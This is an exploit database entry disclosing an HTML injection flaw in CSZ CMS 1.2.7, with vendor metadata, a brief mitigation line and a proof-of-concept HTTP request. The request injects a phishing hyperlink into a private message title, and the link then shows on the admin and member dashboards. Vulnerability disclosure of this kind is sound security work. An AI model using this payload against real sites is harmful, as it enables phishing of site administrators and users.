CSZ CMS 1.2.7 - 'title' HTML Injection

vendor:

CSZ CMS

by:

Metin Yunus Kandemir

8.8

CVSS

HIGH

HTML Injection

CWE

Product Name: CSZ CMS

Affected Version From: 1.2.7

Affected Version To: 1.2.7

Patch Exists: NO

Related CWE: N/A

CPE: a:cszcms:csz_cms:1.2.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2019

CSZ CMS 1.2.7 – ‘title’ HTML Injection

Authenticated user can inject hyperlink to Backend System Dashboard and Member Dashboard via message.

Mitigation:

Input validation should be done to prevent HTML injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send